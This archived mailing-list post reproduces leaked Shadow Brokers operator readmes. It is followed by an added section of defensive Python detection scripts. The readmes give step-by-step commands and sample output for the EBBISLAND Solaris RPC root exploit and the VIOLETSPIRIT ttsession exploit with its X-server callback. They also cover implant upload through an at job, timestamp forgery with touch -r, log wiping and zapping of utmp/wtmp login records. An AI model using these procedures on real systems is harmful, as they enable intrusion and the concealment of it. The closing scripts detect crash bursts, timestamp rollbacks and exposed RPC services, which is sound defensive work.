[Dailydave] Just so you don't have to...

Dave Aitel dave.aitel at gmail.com
Sat Dec 17 09:35:42 EST 2016


I went through the Shadowbroker.zip file they released. It's like, super
old boring crap but the following readmes were mistakenly included it
seems. I'll hit a few enters if you don't want to read it because you have
clearance.
-dave























































# as of: 2010-07-29 18:01:21 EDT


# EBBISLAND
# (Exploit for Solaris 2.6, 2.7, 2.8, 2.9 and 2.10)

# First ensure that the vulnerable rpc service is running. You must
# be able to reach the target system's TCP port that the designated target RPC
# is listening upon.

# EBBISLAND USAGE.

# ebbisland: (-A <address>) Shellcode address
#
# ebbisland: (-C) /core file overwriter/scrambler. This option throws the attack, but uses pseudo-random
#            binary data in place of the actual shellcode, to produce a /core file free of suspicious
#            content. This would be used in the case where EBBISLAND failed to successfully exploit the
#            target, and the operator wanted to try and "purify" the file left in /core before quitting.
#
# ebbisland: (-c <procnum>) Procedure number.  Defaults to 0.
#
# ebbisland: (-D) For an extra dummy connection
#
# ebbisland: (-N) Use for non-inetd started services (i.e. rpc.bootparamd)
#
# ebbisland: (-M <mtu>) Choose size of data part of packet to send. Default is 1260.  This could affect
#            the landing zone size.
#
# ebbisland: (-P <prog>) Optional prog to exec, re-using exploit socket.
#
# ebbisland: (-r <prognum>) RPC program number
#
# ebbisland: (-s <source port>)
#
# ebbisland: (-V) Provides verbose outputs, where appropriate and desired.
#
# ebbisland: (-X | -F) -X For indirect/xdr_replymsg programs, and -F for others

#
*********************************************************************************************


mx
:%s,SERVICE_TCP_PORT,SERVICE_TCP_PORT,g
:%s,TARGET_RPC_SERVICE,100026,g
:%s,TARGET_IP,TARGET_IP,g
:%s,SPECIFIC_SHELLCODE_ADDRESS,SPECIFIC_SHELLCODE_ADDRESS,g
`x

# Scanning:

-scan brpc TARGET_IP

# Redirector:

-tunnel
l SERVICE_TCP_PORT TARGET_IP


# Exploit:
# ./ebbisland -t 127.0.0.1 -p 32794 -r 100026 -X -N -A 0x6e908
./ebbisland -t 127.0.0.1 -p SERVICE_TCP_PORT -r TARGET_RPC_SERVICE -X -N -A SPECIFIC_SHELLCODE_ADDRESS

./ebbisland -t 127.0.0.1 -p 32794 -r 100026 -X -N -A 0x6e908

**********************************************************************************
Exploit will provide ROOT shell access via same tunnel/session (no callback, no listen).

# EXPLOIT WINDOW

unset HISTSIZE
unset HISTFILESIZE
unset HISTFILE
w
pwd
id
which uudecode uncompress at
cd /tmp
ls -alrt
mkdir /tmp/.scsi
cd /tmp/.scsi
pwd

ls -lart

# Usual method of running NOPEN fails with EBBISLAND
#  we use an at command to do so.

# NORMAL LOCATION FOR AT FILES

ls -lart /var/spool/cron
ls -lart /var/spool/cron/atjobs

# PRESERVE THE DATE FROM BEFORE THE AT JOB

touch -r /var/spool/cron/atjobs x

# LOCALLY

packrat -l
gedit /current/up/sendmail.Z.uu


# EXPLOIT WINDOW

/usr/bin/uudecode; ls -latr

# select all/copy gedit contents into Target exploit window, then:
uncompress sendmail.Z
ls -l
chmod 700 sendmail

# EXPLOIT WINDOW (CREATING AT JOB)

echo "PATH=. D=-ulrandom11111-55555-2 sendmail" | at now
netstat -an | grep random11111-55555-2

# TOUCH THE ATJOBS FILE BACK TO BEFORE TIME

touch -r x /var/spool/cron/atjobs

# VERIFY TIMES FROM BEFORE

ls -lart /var/spool/cron
ls -lart /var/spool/cron/atjobs


# FROM REDIRECTOR

-nstun TARGET_IP:random11111-55555-2


*******************************************************************************

CLEANING.

/core
/var/adm/messages


*  The correct EBBISLAND attack for the remote target architecture must be used, or else the attack will fail.
*  Use -C option to clean failures remotely if we never get on.

# Logging considerations: Quite a few log messages will be generated on the target as each subsequent
# attempt fails, most likely written to the /var/adm/messages file. These could include messages similar to...

Sep 27 14:37:23 target inetd[146]: [ID 858011 daemon.warning] /platform/SUNW,Ultra-Enterprise-10000/lib/dr_daemon: Illegal Instruction
Sep 27 14:37:24 target dr_daemon[23501]: [ID 629332 daemon.notice] dr_daemon attempting AP interaction
Sep 27 14:37:24 target dr_daemon[23501]: [ID 264428 daemon.error] ld.so.1: dr_daemon: fatal: libap.so: open failed: No such file or directory
Sep 27 14:37:24 target dr_daemon[23501]: [ID 355200 daemon.error] dr_daemon operating in NO AP interaction mode
Sep 27 14:37:24 target dr_daemon[23501]: [ID 309875 daemon.notice] NOTICE: recovered old state file '/tmp/.dr_extra_info'
Sep 27 14:43:10 target inetd[146]: [ID 858011 daemon.warning] /usr/openwin/bin/kcms_server: Illegal Instruction - core dumped
Sep 27 14:43:11 target inetd[146]: [ID 858011 daemon.warning] /usr/openwin/bin/kcms_server: Segmentation Fault - core dumped
Sep 27 14:43:13 target last message repeated 1 time
Sep 27 14:43:14 target inetd[146]: [ID 858011 daemon.warning] /usr/openwin/bin/kcms_server: Illegal Instruction - core dumped
Sep 27 14:43:15 target inetd[146]: [ID 858011 daemon.warning] /usr/openwin/bin/kcms_server: Segmentation Fault - core dumped
Sep 27 14:43:17 target last message repeated 2 times
Sep 27 14:43:55 target inetd[146]: [ID 858011 daemon.warning] /usr/sbin/rpc.metad: Illegal Instruction - core dumped
Sep 27 14:43:56 target inetd[146]: [ID 858011 daemon.warning] /usr/sbin/rpc.metad: Bus Error - core dumped
Sep 27 14:43:57 target inetd[146]: [ID 858011 daemon.warning] /usr/sbin/rpc.metad: Segmentation Fault - core dumped
-----

mx
:%s/PITCH_IP/PITCH_IP/g
:%s/TARGET_IP/TARGET_IP/g
:%s/HOST_NAME/HOST_NAME/g
:%s/DOMAIN_NAME/DOMAIN_NAME/g
:%s/RAT_NAME/RAT_NAME/g
:%s/RHP-22/RHP-22/g
:%s/RHP-23/RHP-23/g
:%s/RHP-24/RHP-24/g
:%s/WORK_DIR/WORK_DIR/g
`x

### If ratload fails, use doubleT
# wrap-telnet.sh -l REDIRECTIP -p RHP-22 -s RHP-23 -x RHP-24
# xc -x REDIRECTIP -y RHP-24 -s REDIRECTIP 127.0.0.1
# doubleT -i PITCH_IP -t RHP-22 RHP-23
# -tunnel
# u 177 TARGET_IP
# r RHP-22
# r RHP-23
# r RHP-24

# On redirector - set up nopen tunnel

-tunnel
u 177 TARGET_IP
r RHP-24
r RHP-21
s

######## use ys.auto first which won't require you to start separate xc
command
######## selects random ports for you
######## brings up scripted packrat window
######## gives pastable -tunnel commands if redirecting
########  examples:
####   ys.auto -l 19.16.1.1 -i 10.0.3.1 -n 2222 -r nscd -x 9999 -d /tmp/.dir
####   ys.auto -i 10.0.3.1
####   ys.auto -i TARGET_IP -l REDIRECTOR_IP
#######<ctrl><c> or <ctrl><d> on nc window first, then delete all pop-ups

        #Local window1
./wrap-sun.sh -l PITCH_IP -r RAT_NAME -p RHP-21 -x RHP-24 -d /tmp/WORK_DIR
        #hit return
        # type y and hit return

        #Local window2
        # for redirection local ip is redirector ip

./xc -s PITCH_IP -x PITCH_IP -y RHP-24 TARGET_IP
        #hit return
        #hit return
        #hit return
        #(At this point you should see a continue.... in your attack1 window

        #in the attack1 window
        #hit return
        #hit return
        #hit return

        #(you should see your upload happen...)

        #Ctrl-C your nc window
        #Ctrl-C your xc window
#w/o tunneling
../bin/noclient TARGET_IP

#w/ tunneling. In redirector window
-nstun TARGET_IP

##### If ratload fails, use doubleT
# wrap-telnet.sh -l REDIRECTIP -p RHP-22 -s RHP-23 -x RHP-24
# xc -x REDIRECTIP -y RHP-24 -s REDIRECTIP 127.0.0.1
# doubleT -i PITCH_IP -t RHP-22 RHP-23
# -tunnel
# u 177 TARGET_IP
# r RHP-22
# r RHP-23
# r RHP-24
##### otherwise continue

-rm RAT_NAME

##### Cleaning up ######
ps -ef |grep dtlogin

# You should see a recent one : mine was
kill -9 DTLOGINPORT

ps -ef |grep dtlogin

-ls -t /var/dt/

# you will notice Xerrors is the most recent

-tail /var/dt/Xerrors

# if your entries are the only ones there....

cat /dev/null >/var/dt/Xerrors

# if there are other entries you will do something like

wc -l /var/dt/Xerrors

subtract the number of lines that are because of you from above

head -(what's left) > t ; cat t

if it looks good:

cat t >/var/dt/Xerrors
-rm t

-ls -t /var/adm
#anything that has a reasonably current timestamp you should check

#toasting the login entries.....

# Target window
-put ../up/toast t

### TO VIEW...
./t -u /var/adm/utmp
./t -u /var/adm/wtmp | tail -20
./t -x /var/adm/utmpx
./t -x /var/adm/wtmpx | tail -20
./t -l /var/adm/lastlog | tail

### TO ZAP...
./t -u /var/adm/utmp tty date
./t -u /var/adm/wtmp tty date
./t -x /var/adm/utmpx tty date
./t -x /var/adm/wtmpx tty date
--------------------------------------------------------------------------

VIOLETSPIRIT can be used against versions 4 and 5 of the "ttsession"
daemon found in the Common Desktop Environment (CDE) Solaris 2.X, on both SPARC
and x86 platforms.  As of this writing (21 May 2003), it has been successfully
tested against...

    Solaris 2.6 SPARC ("ttsession" version 4)
    Solaris 2.6 x86   ("ttsession" version 4)
    Solaris 2.7 SPARC ("ttsession" versions 4 and 5)
    Solaris 2.7 x86   ("ttsession" versions 4 and 5)
    Solaris 2.8 SPARC ("ttsession" version 5)
    Solaris 2.8 x86   ("ttsession" version 5)
    Solaris 2.9 SPARC ("ttsession" version 5)
    Solaris 2.9 x86   ("ttsession" version 5)

The VIOLETSPIRIT exploit, if successful, sets up a "dtterm" terminal
connected to an X server of your choice over a TCP connection.  VIOLETSPIRIT
can also be redirected via various redirection tools.

Platform-specific run-time instructions can be found below. I give
1 example for a version 4 exploit, and 1 example for a version 5 exploit, as
they involve slightly different processes.  A version 4 exploit involves just
an attack, while a version 5 involves a bit more...

=============================================================================
=============================================================================
(Solaris 2.6 SPARC target, "ttsession" version 4)............................

###### Are they vulnerable???
$ rpcinfo -p 555.1.9.56
.
.
.
1342177279    4   tcp  32786
1342177279    1   tcp  32786
1342177279    3   tcp  32786
1342177279    2   tcp  32786
$

## Okay, he looks like a Solaris 2.6 box, running "ttsession" version 4...
##
## What options do we have?
$ ./vs.attack.linux
Please specify tgt IP address and hostname
Usage: ./vs.attack.linux -i tgt_ipaddr -h tgt_hostname -x xserver_port
  optional args:
    [-c cb_ipaddr]   : default use my ip addr
    [-p cb_port]     : callback port (default random)
    [-n tcp_port]    : default use portmapper to determine
    [-7]               use Solaris 7+ default ttsession program number 1289637086(0x4cde4cde)
                     : default use Solaris 6- ttsession program number 1342177279(0x4fffffff)
    [-r rpcprognum]  : ttsession program number if different from defaults
    [-v rpc version] : default 4 : Solaris 8 and other patched versions use version 5
    [-T seconds]       set approx time at which target ttsession started for version 5 rpc
                       time is in seconds since epoch
    [-t microsecs]     refine approx time at which target ttsession started
                       time is in microseconds
    [-q xserver_ip]    default <my ip>
$

## For Solaris 2.6, version 4...to display a "dtterm" back to the
##   X server at 555.1.2.48:0.0...
$ ./vs.attack.linux -i 555.1.9.56 -h murray -q 555.1.2.48 -x 6000 -n 32786
Client created

rendez ip is set to 555.1.2.48

tgt ttsession is using port 32786

Got from target: TT Session ID: P 01 354 1342177279 1 0 0 555.1.9.56 4

TT Session is using program number 0x4fffffff

TT Session is process id 354 being run by uid 0

  continue ...

## VIOLETSPIRIT prompts the user at several points, to establish visual
##   verification of the protocol interactions before proceeding to the
##   next step.  Assuming everything looks okay, just hit the "Enter" key
##   at the "continue..." prompt to keep on going...

Got from target: TT Process ID: 1._jhjr

TT session start time 1052162933 Mon May  5 14:28:53 2003

TT pid 1

  continue ...

Associate process id

assoc_process_id: starting cookie time at 1052162933 0
port 33721 (0x83b9) bound for listening


Mon May  5 15:42:22 2003

Going for cb accept
Done cb acccept

Your Xserver should be running on 555.1.2.48 port 6000

About to tell the target to create a DT Terminal on DISPLAY
547725836848:67108864.1097364144128

  continue ...

## Okay...when you hit "Enter" here, the target will attempt to display
##   a "dtterm" back to your prespecified X server...better have one up
##   and waiting...

SDT_go_term - got success on cb
SDT_go_term done
0x00000000
0x00000001
>>> BITS 0x01120635
0x01 = 0
STATE = 5 TT_STARTED
0x10 = 1
0x20 = 2


0x200 RESULT = 0
No of args = 00000000

0x00000400 = 00000008

Handler P Type: SDT_Terminal
No of contexts = 00000001

$DISPLAY: 0x00000000 arg type 3 string: 0xffffffff c type 2
"547725836848:67108864.1097364144128"
More data = 00000016

## At this point, after a short delay, you should see a "dtterm" pop up on
##   your prespecified X server.  Watch the "tcpdump" window...you'll see
##   _lots_ of TCP traffic being exchanged between your X server and the
##   target...


All done - press return to close down the tcp stream

## Hit "Enter" one more time, for a graceful closeout of VIOLETSPIRIT.

$

=============================================================================
=============================================================================
(Solaris 2.9 x86 target, "ttsession" version 5)............................

###### Are they vulnerable???
$ rpcinfo -p 555.1.3.42
  program vers proto   port
.
.
.
1289637086    5   tcp  33143
1289637086    1   tcp  33143

$

## Okay, he looks like a Solaris 2.7+ box, running "ttsession" version 5...
##
## First we need to get the times for the magic cookie for the attack to work
## What options do we have?

## Because the "gettime" binary is uploaded to targets, no usage is ever printed
## But here are the options:

$ ./vs.gettime.sol.sparc
Please specify tgt IP address and hostname
Usage: ./vs.get.sol.sparc -i tgt_ipaddr -h tgt_hostname
  optional args:
    [-c cb_ipaddr]   : default use my ip addr
    [-p cb_port]     : callback port (default random)
    [-n tcp port]    : default use portmapper to determine
    [-r rpcprognum]
    [-T seconds]       set approx time at which target ttsession started for version 5 rpc
                       time is in seconds since epoch
    [-t microsecs]     refine approx time at which target ttsession started
                       time is in microseconds

## We're now getting the times for the magic cookie.  This will take several minutes ON
## AVERAGE over a fast link, it is STRONGLY discouraged to run this over a dialup
## connection unless you enjoy staring at slowly printed dots for hours on end.
## If at all possible, upload this somewhere else and lose the dialup bottleneck.

## For Solaris 2.7+, version 5...to get the proper times needed for the attack
$ ./vs.get.sol.sparc -i 555.1.3.42 -h dellosaurus -n 33143
Client created

rendez ip is set to 555.1.2.48

tgt ttsession is using port 33143

Got from target: TT Session ID: P 01 7449 1289637086 1 1 0 555.1.3.42 5 dellosaurus

TT Session is using program number 0x4cde4cde

TT Session is process id 7449 being run by uid 0

  continue ...

gss_getinfo returned: 0xffffffff 0xffffffff 0xffffffff

Got from target: TT Process ID: 1._jiOG

TT session start time 1052165648 Mon May  5 15:14:08 2003

TT pid 1

  continue ...

## VIOLETSPIRIT prompts the user at several points, to establish visual
##   verification of the protocol interactions before proceeding to the
##   next step.  Assuming everything looks okay, just hit the "Enter" key
##   at the "continue..." prompt to keep on going...

Associate process id

assoc_process_id: starting cookie time at 1052165648 0
Mon May  5 16:21:17 2003
port 33733 (0x83c5) bound for listening
.................................................. Mon May  5 16:22:16 2003
.................................................. Mon May  5 16:23:19 2003
.................................................. Mon May  5 16:24:19 2003
.................................................. Mon May  5 16:25:16 2003
.................................................. Mon May  5 16:26:14 2003
.................................................. Mon May  5 16:27:11 2003
.................................................. Mon May  5 16:28:08 2003
.................................................. Mon May  5 16:29:06 2003
.................................................. Mon May  5 16:30:04 2003
.................................................. Mon May  5 16:31:01 2003
.................................................. Mon May  5 16:31:58 2003
.................................................. Mon May  5 16:32:56 2003
.................................................. Mon May  5 16:33:53 2003
.................................................. Mon May  5 16:34:51 2003
.........................

Mon May  5 16:35:20 2003

Good cookie found using times 1052165648 725142
$

## Cool!  We found the times to make the magic cookie.
## Let's now see our attack options
$ ./vs.attack.linux
Must specify time values with rpc version 5
Usage: ./vs.attack.linux -i tgt_ipaddr -h tgt_hostname -x xserver_port
  optional args:
    [-c cb_ipaddr]   : default use my ip addr
    [-p cb_port]     : callback port (default random)
    [-n tcp_port]    : default use portmapper to determine
    [-7]               use Solaris 7+ default ttsession program number 1289637086(0x4cde4cde)
                     : default use Solaris 6- ttsession program number 1342177279(0x4fffffff)
    [-r rpcprognum]  : ttsession program number if different from defaults
    [-v rpc version] : default 4 : Solaris 8 and other patched versions use version 5
    [-T seconds]       set approx time at which target ttsession started for version 5 rpc
                       time is in seconds since epoch
    [-t microsecs]     refine approx time at which target ttsession started
                       time is in microseconds
    [-q xserver_ip]    default <my ip>
$

## Now, for the attack...
$ ./vs.attack.linux -i 555.1.3.42 -h dellosaurus -n 33143 -7 -v 5 -c 555.1.2.48 -q 555.1.2.48 -x 6000 -T 1052165648 -t 725142
Client created

rendez ip is set to 555.1.2.48

tgt ttsession is using port 33143

Got from target: TT Session ID: P 01 7449 1289637086 1 1 0 555.1.3.42 5 dellosaurus

TT Session is using program number 0x4cde4cde

TT Session is process id 7449 being run by uid 0

  continue ...

gss_getinfo returned: 0xffffffff 0xffffffff 0xffffffff

Got from target: TT Process ID: 2._jiOG

TT session start time 1052165648 Mon May  5 15:14:08 2003

TT pid 2

  continue ...

Associate process id

assoc_process_id: starting cookie time at 1052165648 725142
Mon May  5 17:19:13 2003
port 33737 (0x83c9) bound for listening


Mon May  5 17:19:13 2003

Good cookie found using times 1052165648 725142
Going for cb accept
Done cb acccept

Your Xserver should be running on 555.1.2.48 port 6000

About to tell the target to create a DT Terminal on DISPLAY
547725836848:67108864.1097364144128

  continue ...

## EUREKA!!!  When you hit "Enter" here, the target will attempt to display
##   a "dtterm" back to your prespecified X server...better have one up
##   and waiting...

SDT_go_term done
0x00000000
0x00000001
>>> BITS 0x01120635
0x01 = 0
STATE = 5 TT_STARTED
0x10 = 1
0x20 = 2


0x200 RESULT = 0
No of args = 00000000

0x00000400 = 00000008

Handler P Type: SDT_Terminal
No of contexts = 00000001

$DISPLAY: 0x00000000 arg type 3 string: 0xffffffff c type 2
"547725836848:67108864.1097364144128"
More data = 00000016

## At this point, after a short delay, you should see a "dtterm" pop up on
##   your prespecified X server.  Watch the "tcpdump" window...you'll see
##   _lots_ of TCP traffic being exchanged between your X server and the
##   target...

All done - press return to close down the tcp stream

## Hit "Enter" one more time, for a graceful closeout of VIOLETSPIRIT.

$
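Editor's note, added to this archived post and not part of Dave's message or the quoted readmes: the EBBISLAND readme's "Logging considerations" block is the most useful thing in here for a defender, because it tells you what a failed attempt looks like on the target. The script below is an added example that turns that excerpt into a detection: it parses Solaris inetd fault records out of /var/adm/messages, expands syslog's "last message repeated N times" lines back into individual events, and flags any daemon that faulted more than a handful of times inside a short window. The sample input is the readme's own log excerpt with the e-mail line wrapping undone; the thresholds are assumptions chosen for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample input: the /var/adm/messages excerpt quoted in the EBBISLAND
# readme, with the e-mail line wrapping undone so each record is on one line.
SAMPLE_MESSAGES = """\
Sep 27 14:37:23 target inetd[146]: [ID 858011 daemon.warning] /platform/SUNW,Ultra-Enterprise-10000/lib/dr_daemon: Illegal Instruction
Sep 27 14:37:24 target dr_daemon[23501]: [ID 629332 daemon.notice] dr_daemon attempting AP interaction
Sep 27 14:37:24 target dr_daemon[23501]: [ID 264428 daemon.error] ld.so.1: dr_daemon: fatal: libap.so: open failed: No such file or directory
Sep 27 14:37:24 target dr_daemon[23501]: [ID 355200 daemon.error] dr_daemon operating in NO AP interaction mode
Sep 27 14:37:24 target dr_daemon[23501]: [ID 309875 daemon.notice] NOTICE: recovered old state file '/tmp/.dr_extra_info'
Sep 27 14:43:10 target inetd[146]: [ID 858011 daemon.warning] /usr/openwin/bin/kcms_server: Illegal Instruction - core dumped
Sep 27 14:43:11 target inetd[146]: [ID 858011 daemon.warning] /usr/openwin/bin/kcms_server: Segmentation Fault - core dumped
Sep 27 14:43:13 target last message repeated 1 time
Sep 27 14:43:14 target inetd[146]: [ID 858011 daemon.warning] /usr/openwin/bin/kcms_server: Illegal Instruction - core dumped
Sep 27 14:43:15 target inetd[146]: [ID 858011 daemon.warning] /usr/openwin/bin/kcms_server: Segmentation Fault - core dumped
Sep 27 14:43:17 target last message repeated 2 times
Sep 27 14:43:55 target inetd[146]: [ID 858011 daemon.warning] /usr/sbin/rpc.metad: Illegal Instruction - core dumped
Sep 27 14:43:56 target inetd[146]: [ID 858011 daemon.warning] /usr/sbin/rpc.metad: Bus Error - core dumped
Sep 27 14:43:57 target inetd[146]: [ID 858011 daemon.warning] /usr/sbin/rpc.metad: Segmentation Fault - core dumped
"""

TS = r"(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d)"
# inetd reporting that a child it spawned died on a fault, with or without a core file
CRASH_RE = re.compile(
    TS + r" (?P<host>\S+) inetd\[\d+\]: \[ID \d+ [\w.]+\] (?P<daemon>\S+): "
    r"(?P<signal>Illegal Instruction|Segmentation Fault|Bus Error)(?: - core dumped)?$"
)
# syslog's suppression record; it refers to the immediately preceding message only
REPEAT_RE = re.compile(TS + r" (?P<host>\S+) last message repeated (?P<n>\d+) times?$")


def _ts(s):
    # Solaris syslog timestamps carry no year; good enough for windowing within one file.
    return datetime.strptime(s, "%b %d %H:%M:%S")


def parse_crash_events(text):
    """Return one (timestamp, daemon, signal) tuple per inetd child fault,
    expanding 'last message repeated N times' records into N extra events."""
    events, last = [], None
    for line in text.splitlines():
        m = CRASH_RE.match(line)
        if m:
            last = (_ts(m["ts"]), m["daemon"], m["signal"])
            events.append(last)
            continue
        m = REPEAT_RE.match(line)
        if m and last is not None:
            # repeats reuse the suppressed message's text but carry their own time
            events.extend([(_ts(m["ts"]), last[1], last[2])] * int(m["n"]))
            continue
        last = None  # any other record breaks the repeat chain


    return events


def find_crash_bursts(events, threshold=3, window=timedelta(seconds=120)):
    """Per daemon, find the densest run of faults inside `window` and report
    the ones reaching `threshold`. One fault is noise; a cluster of them
    against one RPC service is what the readme says a failed attempt leaves."""
    by_daemon = defaultdict(list)
    for ts, daemon, _signal in events:
        by_daemon[daemon].append(ts)
    bursts = {}
    for daemon, times in by_daemon.items():
        times.sort()
        best, lo = (0, None, None), 0
        for hi, t in enumerate(times):
            while t - times[lo] > window:
                lo += 1
            if hi - lo + 1 > best[0]:
                best = (hi - lo + 1, times[lo], t)
        if best[0] >= threshold:
            bursts[daemon] = {"count": best[0], "first": best[1], "last": best[2]}
    return bursts


if __name__ == "__main__":
    for daemon, b in find_crash_bursts(parse_crash_events(SAMPLE_MESSAGES)).items():
        print(f"{daemon}: {b['count']} faults between {b['first'].time()} and {b['last'].time()}")
```

On the readme's excerpt this flags kcms_server (seven faults in seven seconds, two of them hidden inside "repeated" records) and rpc.metad (three in three seconds), and correctly ignores the single dr_daemon fault. Pair a hit with a look for a fresh /core in the root directory: the readme's -C option exists precisely to overwrite that file with random bytes, so a core whose timestamp matches a burst but whose contents disassemble to nothing is itself a finding.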
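Second added example, again not from the post: the EBBISLAND notes preserve the at-spool directory's timestamp with touch -r before dropping a job and restore it afterwards. On a POSIX filesystem that leaves a tell: adding an entry to a directory updates its mtime and ctime together, but a later utime()/touch -r only resets mtime and pushes ctime to "now". A directory whose ctime is well after its mtime and which contains an entry newer than that mtime has therefore had its mtime set backwards after something was created in it. The script walks a tree looking for that pattern and rebuilds the readme's scenario in a temporary directory so it can be run anywhere; the spool layout and the one-hour rollback are constructed for the demonstration.

```python
import os
import shutil
import tempfile
import time


def find_timestamp_rollbacks(root, slack=1.0):
    """Walk `root` and return directories whose mtime looks rolled back:
    ctime later than mtime by more than `slack` seconds AND an entry inside
    that is newer than the directory's own mtime. Both together are needed;
    either alone has benign explanations."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        d = os.stat(dirpath)
        if d.st_ctime - d.st_mtime <= slack:
            continue  # mtime and ctime agree: no metadata-only rewrite happened
        newest = 0.0
        for name in dirnames + filenames:
            try:
                st = os.lstat(os.path.join(dirpath, name))
            except OSError:
                continue  # entry vanished while walking; not our problem here
            newest = max(newest, st.st_mtime, st.st_ctime)
        if newest > d.st_mtime + slack:
            findings.append({
                "path": dirpath,
                "dir_mtime": d.st_mtime,
                "dir_ctime": d.st_ctime,
                "newest_entry": newest,
            })
    return findings


def demo_scenario():
    """Build the readme's situation in a throwaway tree (constructed data, not a
    real spool) and return the flagged paths relative to the tree root."""
    root = tempfile.mkdtemp(prefix="atspool-demo-")
    try:
        spool = os.path.join(root, "spool", "atjobs")
        control = os.path.join(root, "control")
        os.makedirs(spool)
        os.makedirs(control)
        remembered = time.time() - 3600  # the spool's "before" timestamp
        # a job file appears in the spool, which bumps the spool's mtime and ctime ...
        with open(os.path.join(spool, "job.a"), "w") as f:
            f.write("constructed at-job\n")
        # ... and the spool's mtime is then pushed back to the remembered value,
        # which is what `touch -r x /var/spool/cron/atjobs` does to the real one.
        os.utime(spool, (remembered, remembered))
        # control directory: a file is created and nothing is rolled back
        with open(os.path.join(control, "normal.txt"), "w") as f:
            f.write("nothing to see\n")
        flagged = find_timestamp_rollbacks(root)
        return sorted(os.path.relpath(f["path"], root) for f in flagged)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print("directories with rolled-back mtime:", demo_scenario())
```

The check is a triage heuristic, not proof: a chmod or chown on a directory also moves ctime past mtime, and files edited in place are legitimately newer than the directory that holds them, so an administrator who chmods a directory of live logs will trip it. Running it over the spool and log directories the readme names (/var/spool/cron, /var/adm, /var/dt) keeps the false positives manageable, and a hit there is worth a closer look at whatever the newest entry is.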
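Third added example, also not part of the post: both readmes start from `rpcinfo -p` output, so the cheapest mitigation check is to parse your own hosts' rpcinfo listings and report any registration of the program numbers they name. The parser below handles the column layout shown above (header line, optional service name, the "." elision lines), groups registrations by program, transport and port, and lists the versions offered. The sample is the two ttsession listings quoted above plus a bootparam and a portmapper row added here; the watchlist labels are taken from the readmes' own usage text.

```python
import re

# Program numbers the readmes above refer to: bootparam is the EBBISLAND example's
# -r argument, the other two are the ttsession registrations VIOLETSPIRIT's usage
# text calls the "Solaris 6-" and "Solaris 7+" defaults.
WATCHLIST = {
    100026: "bootparam (rpc.bootparamd)",
    0x4FFFFFFF: "CDE ttsession (Solaris 6- default program number)",
    0x4CDE4CDE: "CDE ttsession (Solaris 7+ default program number)",
}

# Constructed rpcinfo -p output: the readmes' ttsession rows, plus a bootparam
# row and a portmapper row added for illustration.
SAMPLE_RPCINFO = """\
   program vers proto   port
    100000    4   tcp    111  portmapper
    100000    4   udp    111  portmapper
    100026    1   udp  32780  bootparam
.
.
1342177279    4   tcp  32786
1342177279    1   tcp  32786
1342177279    3   tcp  32786
1342177279    2   tcp  32786
1289637086    5   tcp  33143
1289637086    1   tcp  33143
"""

ROW_RE = re.compile(r"^\s*(\d+)\s+(\d+)\s+(tcp|udp)\s+(\d+)(?:\s+(\S+))?\s*$")


def parse_rpcinfo(text):
    """Parse `rpcinfo -p` rows into dicts; header, blank and '.' lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        prog, vers, proto, port, name = m.groups()
        rows.append({"program": int(prog), "version": int(vers),
                     "proto": proto, "port": int(port), "name": name})
    return rows


def flag_watchlisted(rows, watchlist=WATCHLIST):
    """Collapse registrations of watch-listed programs to one record per
    (program, transport, port), carrying the sorted list of versions offered."""
    found = {}
    for r in rows:
        if r["program"] not in watchlist:
            continue
        key = (r["program"], r["proto"], r["port"])
        entry = found.setdefault(key, {"label": watchlist[r["program"]], "versions": set()})
        entry["versions"].add(r["version"])
    return [
        {"program": program, "proto": proto, "port": port,
         "label": e["label"], "versions": sorted(e["versions"])}
        for (program, proto, port), e in sorted(found.items())
    ]


if __name__ == "__main__":
    for f in flag_watchlisted(parse_rpcinfo(SAMPLE_RPCINFO)):
        print(f"{f['label']}: program {f['program']} on {f['proto']}/{f['port']}, "
              f"versions {f['versions']}")
```

The version list matters because the VIOLETSPIRIT notes distinguish ttsession version 4 from version 5 by the extra work the latter requires; a host still advertising version 4 on TCP is the one to deal with first. On anything with a network-reachable portmapper, the fix the readmes imply is the obvious one: do not run CDE's ttsession or bootparam on hosts that do not need them, and keep port 111 and the dynamic RPC ports off untrusted networks.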
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.immunityinc.com/pipermail/dailydave/attachments/20161217/2f6a36e8/attachment-0001.html>
